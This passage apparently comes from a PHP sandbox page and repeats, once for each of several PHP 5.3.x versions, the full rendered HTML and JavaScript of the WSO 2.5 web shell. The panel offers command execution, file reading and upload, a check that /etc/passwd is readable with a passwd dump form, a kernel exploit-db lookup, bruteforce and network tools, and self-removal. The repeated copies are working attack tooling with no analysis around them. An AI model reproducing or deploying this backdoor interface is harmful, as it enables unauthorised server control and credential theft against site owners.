onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.12
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.12 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.11
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.11 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.10
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.10 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.9
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.9 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.8
